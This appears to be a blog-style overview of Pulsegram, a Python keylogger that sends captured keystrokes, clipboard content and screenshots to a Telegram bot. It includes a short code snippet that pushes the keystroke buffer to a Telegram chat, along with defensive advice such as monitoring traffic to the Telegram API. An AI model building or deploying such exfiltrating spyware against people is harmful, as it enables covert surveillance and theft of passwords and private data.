Pulsegram is a Python-based keylogger integrated with a Telegram bot, designed for capturing keystrokes, clipboard content, and screenshots in real time. Developed by Omar Salazar, the tool is intended for authorized security testing and adversary simulations. While its capabilities are powerful, its misuse could violate privacy laws, making ethical considerations paramount.
Overview of Pulsegram
Pulsegram combines traditional keylogging with Telegram’s messaging infrastructure to exfiltrate captured data. The tool logs keystrokes, monitors clipboard changes, and periodically takes screenshots, sending all collected information to a configured Telegram bot. Its modular design includes pulsegram.py for bot initialization, helpers.py for auxiliary functions, and keylogger.py for core logging features. The project is open-source under the MIT License, emphasizing ethical use in controlled environments.
Similar tools, such as SpyStroke and KeyMon Pro, also leverage Telegram for data exfiltration, highlighting a trend in malware using encrypted messaging platforms for stealth1. Unlike these, Pulsegram focuses on simplicity, with clear documentation for setup and customization of capture intervals.
Technical Implementation
Pulsegram requires Python 3 and dependencies installed via pip install -r requirements.txt. Users must configure a Telegram bot token and ChatID before execution. The tool’s asynchronous tasks ensure continuous monitoring without disrupting system performance. Key features include:
- Keystroke Capture: Logs pressed keys and sends them to Telegram.
- Clipboard Monitoring: Detects changes and forwards content.
- Scheduled Screenshots: Takes and transmits screen images at adjustable intervals.
Below is a snippet from keylogger.py, showing the configurable delay for keystroke reporting:
async def send_keystrokes_to_telegram(bot):
global keystroke_buffer
while True:
await asyncio.sleep(1) # Adjustable interval
if keystroke_buffer:
await bot.send_message(chat_id, f"Keystrokes: {keystroke_buffer}")
keystroke_buffer = ""
Security Implications and Mitigations
Telegram’s role in cybercrime has grown, with threat actors using its bots for command-and-control (C2) operations4. Pulsegram’s reliance on Telegram underscores the need for network monitoring to detect unusual bot traffic. Enterprises should:
- Monitor outbound connections to Telegram’s API endpoints (
api.telegram.org). - Restrict unauthorized script executions via application whitelisting.
- Educate users on phishing tactics that deliver such tools.
For researchers, sandboxed testing is critical. Tools like Pulsegram should never be deployed outside authorized environments due to legal risks.
Conclusion
Pulsegram exemplifies the dual-use nature of security tools: valuable for red teams but dangerous in malicious hands. Its integration with Telegram highlights evolving exfiltration techniques, necessitating proactive defenses. Organizations should prioritize behavior-based detection and strict access controls to mitigate risks posed by such tools.
References
- SpyStroke: Advanced Keylogger with Telegram Integration. GitHub. Accessed: 2025-04-29.
- KeyMon Pro: Multi-Feature Monitoring Tool. GitHub. Accessed: 2025-04-29.
- Snake Keylogger Variant (2025). Hackread. Accessed: 2025-04-29.
- Telegram as a Cybercriminal Hotspot. Cybersixgill. Accessed: 2025-04-29.
- Hardware Risks & Mitigation. Stack Exchange. Accessed: 2025-04-29.
